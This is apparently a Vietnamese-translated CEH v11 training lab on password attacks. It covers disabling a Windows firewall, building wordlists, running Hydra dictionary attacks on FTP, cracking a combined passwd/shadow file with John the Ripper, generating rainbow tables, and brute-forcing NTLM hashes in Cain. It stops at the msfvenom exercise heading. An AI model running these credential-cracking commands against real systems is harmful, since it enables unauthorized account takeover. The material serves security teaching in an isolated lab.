CEH v11 Module 5 Hacking Hệ Thống

CEH v11 @ https://akademy.edu.vn/course/khoa-hoc-cehv11-truc-tuyen/

Trong học phần này, bạn sẽ hoàn thành các bài tập sau:

  • Bài tập 1 – Thực hiện tấn công mật khẩu trực tuyến
  • Bài tập 2 – Thực hiện Tấn công Mật khẩu Ngoại tuyến
  • Bài tập 3 – Tạo tải trọng độc lập với Msfvenom

Sau khi hoàn thành phòng thí nghiệm này, bạn sẽ có thể:

  • Tắt Tường lửa Windows trên PLABWIN10
  • Sử dụng danh sách từ
  • Sử dụng Hydra để đoán tên người dùng và mật khẩu
  • Crack mật khẩu Linux bằng John the Ripper
  • Tạo bảng cầu vồng
  • Khôi phục Windows Hashes bằng Cain và Abel
  • Tạo một tải trọng
  • Chia sẻ gánh nặng với nạn nhân
  • Sử dụng mô-đun Multi / handler và khai thác hệ thống

Trong phiên của bạn, bạn sẽ có quyền truy cập vào cấu hình lab sau.

Ảnh chụp màn hình Practice Labs.

Tùy thuộc vào các bài tập, bạn có thể sử dụng hoặc không sử dụng tất cả các thiết bị, nhưng chúng được hiển thị ở đây trong bố cục để hiểu tổng thể về cấu trúc liên kết của phòng thí nghiệm.

  • PLABDC01 – (Windows Server 2019 – Máy chủ miền)
  • PLABDM01 – (Windows Server 2019 – Thành viên miền)
  • PLABWIN10 – (Windows 10 – Máy trạm)
  • PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)

Bài tập 1- Thực hiện tấn công mật khẩu trực tuyến

Một cuộc tấn công mật khẩu trực tuyến được thực hiện trên dịch vụ mạng, chẳng hạn như SSH, HTTP, FTP, SMB, v.v. Ví dụ: kẻ tấn công có thể cố gắng đoán mật khẩu của người dùng từ thông tin đăng nhập Trang web. Hầu hết thời gian, máy chủ hoặc thiết bị mạng không được trang bị để chặn một cuộc tấn công bằng mật khẩu trực tuyến. Do đó, những cuộc tấn công này có thể thành công mà không cần nỗ lực nhiều.

Các cuộc tấn công bằng mật khẩu có thể có hai loại. Loại đầu tiên là tấn công từ điển, sử dụng danh sách các từ phổ biến. Nó tiếp tục chạy qua danh sách cho đến khi tìm thấy một kết quả phù hợp. Mặt khác, một cuộc tấn công brute-force cố gắng sử dụng các từ dựa trên một bộ ký tự nhất định. Với cuộc tấn công bằng mật khẩu trực tuyến, có thể sử dụng một trong hai phương pháp. Tuy nhiên, một cuộc tấn công từ điển chủ yếu là sự lựa chọn vì tốc độ tấn công chậm.

Trong bài tập này, bạn sẽ tìm hiểu về cách thực hiện một cuộc tấn công bằng mật khẩu trực tuyến.

Kết quả học tập

Sau khi hoàn thành bài tập này, bạn sẽ có thể:

  • Tắt Tường lửa Windows trên PLABWIN10
  • Sử dụng danh sách từ
  • Sử dụng Hydra để đoán tên người dùng và mật khẩu

Thiết bị của bạn

Bạn sẽ sử dụng các thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn này ngay bây giờ.

  • PLABDC01 – (Windows Server 2019 – Máy chủ miền)
  • PLABWIN10 – (Windows 10 – Máy trạm)
  • PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)
Ảnh chụp màn hình Practice Labs.

Nhiệm vụ 1 – Tắt Tường lửa Windows trên PLABWIN10

Bạn sẽ cần phải tắt Tường lửa của Windows để thực hiện một cuộc tấn công vào PLABWIN10 . Có những phương pháp tấn công mà bạn có thể sử dụng để vượt qua Windows hoặc bất kỳ tường lửa nào khác đang chạy trên mục tiêu. Tuy nhiên, vì lợi ích của mô-đun này, bạn sẽ tắt Tường lửa của Windows và tiếp tục các tác vụ còn lại.

Để tắt Tường lửa Windows trên PLABWIN10 , hãy thực hiện các bước sau:

Bước 1

Đảm bảo rằng bạn đã kết nối với PLABWIN10 và đăng nhập vào hệ thống.

Lưu ý rằng màn hình PLABWIN10 được hiển thị.

Hình 1.1 Ảnh chụp màn hình PLABWIN10
Hình 1.1 Ảnh chụp màn hình PLABWIN10: Hiển thị màn hình nền của PLABWIN10.

Bước 2

Trong hộp văn bản Nhập vào đây để tìm kiếm , hãy nhập nội dung sau:

windows firewall

Từ kết quả tìm kiếm, chọn Tường lửa của Bộ bảo vệ Windows .

Hình 1.2 Ảnh chụp màn hình PLABWIN10
Hình 1.2 Ảnh chụp màn hình PLABWIN10: Nhấp chuột phải vào Windows Charm và chọn Windows Defender Firewall.

Bước 3

Cửa sổ Tường lửa của Bộ bảo vệ Windows được hiển thị. Trên trang Trợ giúp bảo vệ PC của bạn với Tường lửa của Bộ bảo vệ Windows , nhấp vào Bật hoặc tắt Tường lửa của Bộ bảo vệ Windows trong ngăn bên trái.

Hình 1.3 Ảnh chụp màn hình PLABWIN10
Hình 1.3 Ảnh chụp màn hình PLABWIN10: Nhấp vào Bật hoặc tắt Tường lửa Windows ở khung bên trái.

Bước 4

Trên cài đặt Tùy chỉnh cho từng loại trang mạng , chọn Tắt Tường lửa của Bộ bảo vệ Windows (không được khuyến nghị) cho Miền , Mạng riêng và Mạng công cộng .

Bấm OK .

Hình 1.4 Ảnh chụp màn hình PLABWIN10
Hình 1.4 Ảnh chụp màn hình PLABWIN10: Chọn Tắt Tường lửa Windows (không được khuyến nghị) cho Miền, Mạng riêng và Mạng công cộng.

Bước 5

Trên trang Trợ giúp bảo vệ PC của bạn với Tường lửa của Bộ bảo vệ Windows , hãy lưu ý rằng Tường lửa của Bộ bảo vệ Windows hiện đã bị tắt cho Miền , Riêng tư và Mạng công cộng .

Hình 1.5 Ảnh chụp màn hình PLABWIN10
Hình 1.5 Ảnh chụp màn hình PLABWIN10: Xác minh trạng thái Tường lửa của Windows và đóng Bảng điều khiển.

Đóng cửa sổ Control Panel và cửa sổ PLABWIN10 .

Nhiệm vụ 2 – Sử dụng Danh sách từ

Trong một cuộc tấn công từ điển, một danh sách các từ, được gọi là danh sách từ, được xác định trước và được sử dụng để khớp với mật khẩu của nạn nhân. Có sẵn danh sách mật khẩu được tạo sẵn trên Internet. Danh sách mật khẩu có thể lớn vài byte hoặc cũng có thể là gigabyte, vì càng nhiều từ trong tệp mật khẩu, kích thước càng lớn. Nếu bạn không có ý định sử dụng danh sách từ được xác định trước, bạn có thể tạo danh sách của riêng mình. Có những công cụ có sẵn có thể giúp bạn tạo một danh sách từ. Một số công cụ được sử dụng phổ biến là:

  • Wyd : Công cụ lập hồ sơ mật khẩu
  • Crunch : Trình tạo danh sách từ bẻ khóa mật khẩu
  • CeWL : Trình tạo danh sách từ tùy chỉnh bẻ khóa mật khẩu
  • RSMangler : Trình tạo danh sách từ dựa trên từ khóa để ép buộc Brute

Trong nhiệm vụ này, bạn sẽ tìm hiểu về danh sách từ. Để thực hiện việc này, hãy thực hiện các bước sau:

Bước 1

Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 .

Thông tin xác thực là:

Tên tài khoản:nguồn gốc

Mật khẩu:Passw0rd

Lưu ý rằng màn hình Kali được hiển thị.

Hình 1.6 Ảnh chụp màn hình PLABKALI01
Hình 1.6 Ảnh chụp màn hình PLABKALI01: Hiển thị màn hình nền của PLABKALI01.

Bước 2

Trên màn hình nền, trong ngăn bên trái, nhấp vào biểu tượng Thiết bị đầu cuối .

Hình 1.7 Ảnh chụp màn hình PLABKALI01
Hình 1.7 Ảnh chụp màn hình PLABKALI01: Nhấp vào biểu tượng Terminal ở khung bên trái.

Bước 3

Cửa sổ đầu cuối được hiển thị. Đầu tiên, hãy xem danh sách từ được xác định trước có sẵn trong Kali Linux. Để thực hiện việc này, hãy nhập lệnh sau:

ls -l /usr/share/wordlists

Nhấn Enter .

Hình 1.8 Ảnh chụp màn hình PLABKALI01
Hình 1.8 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để liệt kê các danh sách từ được xác định trước.

Bước 4

Nhận thấy một số tệp danh sách từ được hiển thị.

Hình 1.9 Ảnh chụp màn hình PLABKALI01
Hình 1.9 Ảnh chụp màn hình PLABKALI01: Hiển thị danh sách từ được xác định trước trong Kali Linux.

Bước 5

Xóa màn hình bằng cách nhập lệnh sau:

clear

Bạn có một tùy chọn để sử dụng danh sách từ được xác định trước. Bạn cũng có thể tải xuống danh sách từ từ Internet. Có một số danh sách từ có sẵn đã phát triển thành kích thước Gigabyte. Một giải pháp thay thế là tạo một danh sách từ nhỏ theo cách thủ công, bạn sẽ làm ngay bây giờ. Trong cửa sổ nhắc lệnh, hãy nhập lệnh sau:

leafpad plab.txt

Nhấn Enter .

Hình 1.10 Ảnh chụp màn hình PLABKALI01
Hình 1.10 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để mở tệp plab.txt trong leafpad.

Bước 6

Leafpad mở ra với một tệp có tên (plab.txt ).

Nhập các từ sau:

test

bee

bug

12345

12345678

password

passw0rd
Passw0rd

p@ssw0rd

admin

admin@123


Nhấn Enter sau mỗi từ ngoại trừ từ cuối cùng.

Hình 1.11 Ảnh chụp màn hình PLABKALI01
Hình 1.11 Ảnh chụp màn hình PLABKALI01: Nhập các từ trong tệp Không có tiêu đề.

Bước 7

Nhấn Ctrl + s để lưu tệp.

Đóng tệp plab.txt .

Hình 1.12 Ảnh chụp màn hình PLABKALI01
Hình 1.12 Ảnh chụp màn hình PLABKALI01: Lưu tệp dưới dạng plab.txt.

Bước 8

Hãy xác minh xem plab.txt có được tạo hay không. Nhập lệnh sau vào cửa sổ dòng lệnh:

ls -l

Nhấn Enter . Lưu ý rằng tệp plab.txt đã được tạo.

Hình 1.13 Ảnh chụp màn hình PLABKALI01
Hình 1.13 Ảnh chụp màn hình PLABKALI01: Hiển thị tệp plab.txt trên màn hình nền.

Bước 9

Xóa màn hình bằng cách nhập lệnh sau:

clear

Kali Linux cũng chứa một công cụ có tên cewl , được sử dụng để tạo danh sách từ.

Nhập lệnh sau:Lưu ý: Tham số -w xác định tên của danh sách từ. Tham số -d xác định độ sâu của tìm kiếm trong một Trang web. Tham số -m xác định độ dài từ tối thiểu.

cewl -w test.txt -d 5 -m 3 intranet

Nhấn Enter .

Hình 1.14 Ảnh chụp màn hình PLABKALI01
Hình 1.14 Ảnh chụp màn hình PLABKALI01: Nhập lệnh cewl để tạo danh sách từ.

Bước 10

Lệnh chạy thành công mà không có bất kỳ lỗi nào.

Hình 1.15 Ảnh chụp màn hình PLABKALI01
Hình 1.15 Ảnh chụp màn hình PLABKALI01: Hiển thị kết quả của lệnh cewl.

Bước 11

Hãy xác minh xem tệp test.txt đã được tạo chưa. Nhập lệnh sau:

ls -l

Nhấn Enter .

Hình 1.16 Ảnh chụp màn hình PLABKALI01
Hình 1.16 Ảnh chụp màn hình PLABKALI01: Nhập lệnh ls để liệt kê các tệp.

Bước 12

Lưu ý rằng tệp test.txt đã được tạo.

Hình 1.17 Ảnh chụp màn hình PLABKALI01
Hình 1.17 Ảnh chụp màn hình PLABKALI01: Hiển thị danh sách tệp với tệp test.txt.

Bước 13

Xóa màn hình bằng cách nhập lệnh sau:

clear

Hãy mở tệp test.txt và xem các từ được lưu trữ trong đó.

Nhập lệnh sau:

leafpad test.txt

Nhấn Enter .

Hình 1.18 Ảnh chụp màn hình PLABKALI01
Hình 1.18 Ảnh chụp màn hình PLABKALI01: Nhập lệnh để mở tệp test.txt bằng Leafpad.

Bước 14

Tệp test.txt hiện đã được mở. Nó đã thu được một số từ từ Trang web Intranet.

Đóng tệp này.

Hình 1.19 Ảnh chụp màn hình PLABKALI01
Hình 1.19 Ảnh chụp màn hình PLABKALI01: Hiển thị nội dung của tệp test.txt.

Giữ cửa sổ đầu cuối mở.

Nhiệm vụ 3 – Sử dụng Hydra để đoán tên người dùng và mật khẩu

Hydra là một công cụ có thể thực hiện các cuộc tấn công từ điển chống lại một số giao thức, chẳng hạn như HTTP, FTP, SMB, SSH, v.v. Hydra được thiết kế để thực hiện các cuộc tấn công chống lại các dịch vụ xác thực, có thể đang chạy bằng giao thức, chẳng hạn như HTTP.

Trong nhiệm vụ này, bạn sẽ sử dụng Hydra để đoán tên người dùng và mật khẩu. Để thực hiện việc này, hãy thực hiện các bước sau:

Bước 1

Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 . Cửa sổ nhắc lệnh sẽ được mở.

Xóa màn hình bằng cách nhập lệnh sau:

clear

Hydra không được cài đặt trên Kali Linux theo mặc định. Để sử dụng nó, bạn cần cài đặt nó trước. Nhập lệnh sau:

apt-get install hydra

Nhấn Enter .

Hình 1.20 Ảnh chụp màn hình PLABKALI01
Hình 1.20 Ảnh chụp màn hình PLABKALI01: Nhập lệnh cài đặt hydra.

Bước 2

Quá trình cài đặt cho Hydra bắt đầu. Trong quá trình cài đặt, bạn cần xác nhận cài đặt. Nhập nội dung sau:

Y

Nhấn Enter .

Hình 1.21 Ảnh chụp màn hình PLABKALI01
Hình 1.21 Ảnh chụp màn hình PLABKALI01: Xác nhận cài đặt bằng cách nhập Y.

Bước 3

Quá trình cài đặt cho Hydra vẫn tiếp tục.Lưu ý: Có thể mất vài phút để hoàn tất quá trình cài đặt cho Hydra.

Sau khi cài đặt xong, bạn quay lại lời nhắc trong cửa sổ đầu cuối.

Hình 1.22 Ảnh chụp màn hình PLABKALI01
Hình 1.22 Ảnh chụp màn hình PLABKALI01: Hiển thị quá trình cài đặt hoàn tất cho hydra.

Bước 4

Bây giờ, bạn sẽ sử dụng Hydra để thực hiện tấn công từ điển bằng plab.txt mà bạn đã tạo.Lưu ý: Trong thực tế, danh sách từ sẽ không bao giờ nhỏ như vậy, nhưng để minh họa, chúng ta có thể sử dụng danh sách từ này.

Xóa màn hình bằng cách nhập lệnh sau:

clear

Bạn có một ứng dụng dễ bị tấn công, bWAPP , chạy trên 192.168.0.10 . Bạn sẽ sử dụng tệp plab.txt để thực hiện một cuộc tấn công từ điển chống lại ứng dụng này. Để thực hiện việc này, hãy nhập lệnh sau:Lưu ý: Lệnh hydra nhận các đầu vào tham số sau: -t: Xác định số lần đăng nhập để thử đồng thời. -V: Hiển thị từng lần đăng nhập và mật khẩu. -f : Dừng cuộc tấn công từ điển sau khi tìm thấy kết quả phù hợp với tên người dùng và mật khẩu. -l tên người dùng: Xác định tên người dùng cần được bẻ khóa. Ví dụ: con ong là tên người dùng cho ứng dụng bWAPP. Nếu bạn không biết tên người dùng, bạn có thể sử dụng tham số -L và cung cấp danh sách tên người dùng, tương tự như danh sách từ. -P wordlist: Xác định danh sách từ chứa các mật khẩu có thể xảy ra. Bạn có thể sử dụng tham số -p cho một mật khẩu duy nhất. Tên trang web hoặc địa chỉ IP:Xác định tên trang web hoặc địa chỉ IP của nó. Giao thức : Xác định các dịch vụ mà cuộc tấn công từ điển được khởi chạy.

hydra -t 5 -V -f -l bee -P plab.txt 192.168.0.10 ftp

Nhấn Enter .

Hình 1.23 Ảnh chụp màn hình PLABKALI01
Hình 1.23 Ảnh chụp màn hình PLABKALI01: Nhập lệnh hydra với các tham số để khởi động một cuộc tấn công từ điển.

Bước 5

Hãy xem Hydra có thể tìm ra mật khẩu cho người dùng không, ong .Lưu ý: Tùy theo dung lượng của wordlist mà thời gian nhận được kết quả sẽ khác nhau.

Chú ý dòng chữ màu xanh lá cây. Bạn đã có thể bẻ khóa mật khẩu cho dịch vụ FTP này trên máy chủ, 192.168.0.10 .

Hình 1.24 Ảnh chụp màn hình PLABKALI01
Hình 1.24 Ảnh chụp màn hình PLABKALI01: Hiển thị tên người dùng và mật khẩu đã lấy thành công.

Bài tập 2 – Thực hiện Tấn công Mật khẩu Ngoại tuyến

Không giống như tấn công mật khẩu trực tuyến, là một phương pháp để bẻ khóa mật khẩu cho một dịch vụ mạng, phương pháp ngoại tuyến được thực hiện trên một tệp, chẳng hạn như / etc / shadow trong cơ sở dữ liệu Linux hoặc SAM trong Windows.

Trong bài tập này, bạn sẽ tìm hiểu về cách thực hiện một cuộc tấn công ngoại tuyến.

Kết quả học tập

Sau khi hoàn thành bài tập này, bạn sẽ có thể:

  • Crack mật khẩu Linux bằng John the Ripper
  • Khôi phục mật khẩu băm từ tệp Windows SAM
  • Crack mật khẩu tệp cấu hình
  • Tạo bảng cầu vồng
  • Dump mật khẩu văn bản rõ từ bộ nhớ bằng Windows Credential Editor

Thiết bị của bạn

Bạn sẽ sử dụng thiết bị sau trong phòng thí nghiệm này. Vui lòng bật nguồn thiết bị.

  • PLABDC01 – (Windows Server 2019 – Máy chủ miền)
  • PLABWIN10 – (Windows 10 – Máy trạm)
  • PLABKALI01 – (Kali 2019.2 – Máy trạm Linux Kali)
Ảnh chụp màn hình Practice Labs.

Nhiệm vụ 1 – Bẻ khóa mật khẩu Linux bằng John the Ripper

Mọi hệ thống Linux đều có hai tệp chính chứa thông tin người dùng và mật khẩu. Tệp đầu tiên là / etc / passwd , chứa thông tin người dùng chung, chẳng hạn như:

  • tên tài khoản
  • Mật khẩu được mã hóa
  • Số ID người dùng (UID)
  • Số ID nhóm của người dùng (GID)
  • Tên đầy đủ của người dùng (GECOS)
  • Thư mục chính của người dùng.
  • Vỏ đăng nhập
Hình 2.1 Ảnh chụp màn hình PLABKALI01
Hình 2.1 Ảnh chụp màn hình PLABKALI01: Hiển thị tệp / etc / passwd.

Một hàng trong trường mật khẩu đại diện cho một tài khoản. Các trường được hiển thị theo thứ tự sau dưới dạng shwon trong ví dụ sau:

root:x:0:0:root:/root>/bin/bash

Trường gốc đại diện cho tên người dùng.

Trường x đại diện cho mật khẩu.

Trường 0 , là một trong ví dụ đã cho ở trên, là UID, là User ID.

Trường 0 , là trường thứ hai trong ví dụ đã cho ở trên, là GID, là ID nhóm.

Trường gốc đại diện cho nhận xét, giống như mô tả người dùng hơn.

Trường / root đại diện cho thư mục chính.

Trường / bin / bash đại diện cho trình bao được sử dụng.

Các tin / etc / shadow tập tin, mặt khác, lưu trữ thông tin mật khẩu người dùng. Mật khẩu cho người dùng được lưu trữ dưới dạng mã hóa. Tệp này cũng chứa thông tin, chẳng hạn như:

  • Ngày hết hạn mật khẩu
  • Cần thay đổi mật khẩu hay không
  • Thời gian tối thiểu và tối đa giữa các lần thay đổi mật khẩu
Hình 2.2 Ảnh chụp màn hình PLABKALI01
Hình 2.2 Ảnh chụp màn hình PLABKALI01: Hiển thị tệp / etc / shadow.

Trong nhiệm vụ này, bạn sẽ tìm hiểu về cách bẻ khóa Mật khẩu Linux bằng John the Ripper. Để thực hiện việc này, hãy thực hiện các bước sau:

Bước 1

Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABKALI01 . Cửa sổ đầu cuối sẽ được mở.

Xóa màn hình bằng cách nhập lệnh sau:

clear

Đầu tiên, bạn cần sử dụng lệnh unshadow để kết hợp cả hai tệp / etc / passwd và / etc / shadow . Trong bước này, bạn sẽ kết hợp cả hai tệp này thành một tệp duy nhất có tên là pass . Điều này cần được thực hiện để John the Ripper tiết lộ mật khẩu. Để thực hiện việc này, hãy nhập lệnh sau:

unshadow /etc/passwd /etc/shadow > pass

Nhấn Enter .

Hình 2.3 Ảnh chụp màn hình PLABKALI01
Hình 2.3 Ảnh chụp màn hình PLABKALI01: Nhập lệnh unshadow để kết hợp hai thành một tệp duy nhất có tên là pass.

Bước 2

Lưu ý rằng đầu ra được tạo và lệnh chạy thành công.

Hình 2.4 Ảnh chụp màn hình PLABKALI01
Hình 2.4 Ảnh chụp màn hình PLABKALI01: Hiển thị đầu ra của lệnh làm mờ.

Bước 3

Tiếp theo, bạn sẽ sử dụng John the Ripper để lấy mật khẩu từ tệp, vượt qua .

Để thực hiện việc này, hãy nhập lệnh sau:

john pass

Nhấn Enter .

Hình 2.5 Ảnh chụp màn hình PLABKALI01
Hình 2.5 Ảnh chụp màn hình PLABKALI01: Nhập lệnh john với tệp có tên là pass.

Bước 4

Lưu ý rằng mật khẩu cho người dùng root đã được tiết lộ thành công.

Hình 2.6 Ảnh chụp màn hình PLABKALI01
Hình 2.6 Ảnh chụp màn hình PLABKALI01: Hiển thị mật khẩu đã truy xuất từ ​​tệp tin.

Nhiệm vụ 2 – Tạo bảng cầu vồng

Khi người dùng nhập mật khẩu để đăng nhập vào hệ điều hành, mật khẩu sẽ được chuyển thành hàm băm bằng thuật toán mã hóa. Mật khẩu không được lưu trữ ở định dạng văn bản thuần túy. Khi người dùng nhập mật khẩu, mật khẩu này sẽ được chuyển đổi thành hàm băm và sau đó được so sánh với hàm băm được lưu trữ, đây chỉ là hàm một chiều. Điều này có nghĩa là một khi mật khẩu được băm, nó không thể được hủy. Bạn không thể đảo ngược hàm băm để lấy ra giá trị của nó.

Bảng cầu vồng là một cơ sở dữ liệu chứa danh sách mật khẩu bản rõ được tính toán trước và các giá trị băm tương ứng của chúng. Mỗi từ, khi được chuyển đổi thành hàm băm bằng một thuật toán cụ thể (chẳng hạn như MD5), sẽ luôn tạo ra cùng một hàm băm. Ví dụ: nếu bạn chuyển đổi Passw0rd thành băm, nó sẽ luôn tạo ra băm MD5 sau:

d41e98d1eafa6d6011d3a70f1a5b92f0

Rainbow Table mất nhiều thời gian trong quá trình tạo vì một tệp duy nhất có thể chứa hàng triệu mật khẩu. Mặt khác, chúng có thể được tái sử dụng nhiều lần. Bạn có thể tạo Bảng Cầu vồng của riêng mình hoặc tải xuống từ Internet.

Trong nhiệm vụ này, bạn sẽ học cách tạo Bảng Cầu vồng. Để thực hiện việc này, hãy thực hiện các bước sau:

Bước 1

Đảm bảo bạn đã bật nguồn cho tất cả các thiết bị được liệt kê trong phần giới thiệu và kết nối với PLABWIN10 .

Trên màn hình nền, ở khung bên trái, nhấp chuột phải vào biểu tượng Cain và chọn Mở vị trí tệp .

Hình 2.7 Ảnh chụp màn hình PLABWIN10
Hình 2.7 Ảnh chụp màn hình PLABWIN10: Nhấp chuột phải vào Cain và chọn Mở vị trí tệp.

Bước 2

Các File Explorer cửa sổ được hiển thị. Bấm đúp vào thư mục Winrtgen để mở nó.

Hình 2.8 Ảnh chụp màn hình PLABWIN10
Hình 2.8 Ảnh chụp màn hình PLABWIN10: Nhấp đúp vào thư mục Winrtgen để mở nó.

Bước 3

Trong thư mục Winrtgen , bấm đúp vào Winrtgen .

Hình 2.9 Ảnh chụp màn hình PLABWIN10
Hình 2.9 Ảnh chụp màn hình PLABWIN10: Nhấp đúp vào tệp thực thi Winrtgen.

Bước 4

Hộp thoại Winrtgen v2.9.4 (Rainbow Tables Generator) by mao hiển thị. Nhấp vào Thêm bảng .

Hình 2.10 Ảnh chụp màn hình PLABWIN10
Hình 2.10 Ảnh chụp màn hình PLABWIN10: Hiển thị hộp thoại Winrtgen và nhấp vào Thêm bảng.

Bước 5

Các cầu vồng Bảng thuộc tính hộp thoại sẽ được hiển thị. Bây giờ bạn sẽ thay đổi một số giá trị trong hộp thoại này.

Hình 2.11 Ảnh chụp màn hình PLABWIN10
Hình 2.11 Ảnh chụp màn hình PLABWIN10: Hiển thị hộp thoại Rainbow Table Properties.

Bước 6

Thay đổi các giá trị sau:

Trong menu thả xuống băm , chọn md5 .

Trong hộp văn bản Min Len , ghi đè giá trị hiện có thành 5 .

Trong hộp văn bản Đếm Chuỗi , hãy ghi đè giá trị hiện có thành 1000 .

Bấm OK .

Hình 2.12 Ảnh chụp màn hình PLABWIN10
Hình 2.12 Ảnh chụp màn hình PLABWIN10: Nhập giá trị vào các trường khác nhau trên hộp thoại thuộc tính Bảng Cầu vồng.

Bước 7

Quay lại hộp thoại Winrtgen v2.9.4 (Rainbow Tables Generator) by mao , một Bảng Cầu vồng MD5 hiện đã được thêm vào. Bấm OK .

Hình 2.13 Ảnh chụp màn hình PLABWIN10
Hình 2.13 Ảnh chụp màn hình PLABWIN10: Hiển thị tệp đã thêm trong hộp thoại Winrtgen.

Bước 8

Chọn bảng cầu vồng và nhấp vào Bắt đầu .

Lưu ý rằng dấu kiểm Màu xanh lá cây xuất hiện trên tên tệp. Nhấp vào Thoát .Lưu ý: Nếu bạn không bấm Bắt đầu, tệp sẽ không được tạo và dấu kiểm Màu xanh lá cây sẽ không xuất hiện đối với tên tệp.

Hình 2.14 Ảnh chụp màn hình PLABWIN10
Hình 2.14 Ảnh chụp màn hình PLABWIN10: Hiển thị dấu kiểm Màu xanh lá cây bên cạnh tên tệp.

Bước 9

Bạn đã quay lại cửa sổ File Explorer . Lưu ý rằng Bảng Cầu vồng MD5 hiện đã được tạo trong thư mục Winrtgen .

Hình 2.15 Ảnh chụp màn hình PLABWIN10
Hình 2.15 Ảnh chụp màn hình PLABWIN10: Hiển thị Bảng cầu vồng MD5 được tạo trong thư mục Winrtgen.

Đóng cửa sổ File Explorer .

Nhiệm vụ 3 – Khôi phục Windows Hashes bằng Cain và Abel

Cain & Abel là một tiện ích bẻ khóa mật khẩu có thể giúp bạn khôi phục mật khẩu từ nhiều nguồn khác nhau, chẳng hạn như hệ thống cục bộ và không dây. Nó cung cấp các phương pháp khác nhau để bẻ khóa mật khẩu. Các phương pháp này là:

  • Từ điển
  • Lực lượng vũ phu
  • Phân tích tiền điện tử

Trong nhiệm vụ này, bạn sẽ tìm hiểu về cách sử dụng Cain. Để thực hiện việc này, hãy thực hiện các bước sau:Cảnh báo: Trước khi tiếp tục tác vụ này, bạn cần tắt Tường lửa của Windows. Ngoài ra, hãy tạo một tài khoản người dùng mới có tên là John và đặt mật khẩu làPassw0rd.

Bước 1

Đảm bảo bạn đã cấp nguồn cho các thiết bị cần thiết, Kết nối với PLABWIN10 .

Bấm đúp vào Cain để bắt đầu nó.

Hình 2.16 Ảnh chụp màn hình PLABWIN10
Hình 2.16 Ảnh chụp màn hình PLABWIN10: Nhấp đúp vào biểu tượng Cain trên PLABWIN10.

Bước 2

Các Cain cửa sổ được hiển thị.

Hình 2.17 Ảnh chụp màn hình PLABWIN10
Hình 2.17 Ảnh chụp màn hình PLABWIN10: Hiển thị cửa sổ Cain.

Bước 3

Nhấp vào tab Cracker .

Từ ngăn bên trái, chọn LM & NTLM Hashes .

Hình 2.18 Ảnh chụp màn hình PLABWIN10
Hình 2.18 Ảnh chụp màn hình PLABWIN10: Chọn tùy chọn LM & NTLM Hashes trong khung bên trái.

Bước 4

Nhấp vào nút + ( Thêm vào danh sách ) trên thanh menu.

Hình 2.19 Ảnh chụp màn hình PLABWIN10
Hình 2.19 Ảnh chụp màn hình PLABWIN10: Nhấp vào nút Thêm vào danh sách trên thanh menu.

Bước 5

Các Add NT băm từ trình hướng dẫn được hiển thị. Giữ lựa chọn mặc định và nhấp vào Tiếp theo .

Hình 2.20 Ảnh chụp màn hình PLABWIN10
Hình 2.20 Ảnh chụp màn hình PLABWIN10: Hiển thị Add NT Hashes từ trình hướng dẫn và nhấp vào Tiếp theo.

Bước 6

Lưu ý rằng một số tài khoản người dùng được hiển thị.

Hình 2.21 Ảnh chụp màn hình PLABWIN10
Hình 2.21 Ảnh chụp màn hình PLABWIN10: Hiển thị các tài khoản người dùng cùng với hàm băm của họ.

Bước 7

Trong ngăn bên phải, bấm chuột phải vào Quản trị viên , chọn Brute-Force Attack , rồi chọn NTLM Hashes .

Hình 2.22 Ảnh chụp màn hình PLABWIN10
Hình 2.22 Ảnh chụp màn hình PLABWIN10: Bấm chuột phải vào Administrator, chọn Brute-Force Attack, rồi chọn NTLM Hashes.

Bước 8

Các Brute-Force Attack hộp thoại sẽ được hiển thị. Hộp văn bản được xác định trước chứa một chuỗi ký tự và số. Nhấp vào menu thả xuống và chọn danh sách cuối cùng thứ hai từ dưới cùng. Danh sách này chứa các chữ cái viết thường và viết hoa, số và các ký tự đặc biệt.

Hình 2.23 Ảnh chụp màn hình PLABWIN10
Hình 2.23 Ảnh chụp màn hình PLABWIN10: Chọn các ký tự văn bản và số được xác định trước.

Bước 9

Từ hộp danh sách Độ dài Mật khẩu – Tối đa, đặt giá trị thành 8 .

Nhấp vào Bắt đầu .

Hình 2.24 Ảnh chụp màn hình PLABWIN10
Hình 2.24 Ảnh chụp màn hình PLABWIN10: Định cấu hình cài đặt trong hộp thoại Brute-Force Attack và sau đó nhấp vào Bắt đầu.

Bước 10

Quá trình bẻ khóa mật khẩu được bắt đầu. Lưu ý thời gian trong trường Thời gian còn lại . Thời gian này phụ thuộc vào giá trị được xác định trong menu thả xuống Tối đa và bộ ký tự mà bạn chọn. Giá trị càng cao, thời gian bẻ khóa mật khẩu càng lâu. Ngoài ra, bạn cung cấp nhiều tổ hợp hơn trong bảng mã, sẽ mất nhiều thời gian hơn để sử dụng các tổ hợp và bẻ khóa mật khẩu.

Nhấp vào Dừng .

Hình 2.25 Ảnh chụp màn hình PLABWIN10
Hình 2.25 Ảnh chụp màn hình PLABWIN10: Hiển thị thời gian cần thiết để bẻ khóa hàm băm.

Bước 11

Nhấp vào Thoát .

Hình 2.26 Ảnh chụp màn hình PLABWIN10
Hình 2.26 Ảnh chụp màn hình PLABWIN10: Nhấp vào Exit trên hộp thoại Brute-Force Attack.

Bước 12

Bạn đã quay lại cửa sổ Cain .

Hình 2.27 Ảnh chụp màn hình PLABWIN10
Hình 2.27 Ảnh chụp màn hình PLABWIN10: Hiển thị cửa sổ Cain.

Đóng tất cả các cửa sổ đang mở.

Bài tập 3 – Tạo tải trọng độc lập với Msfvenom

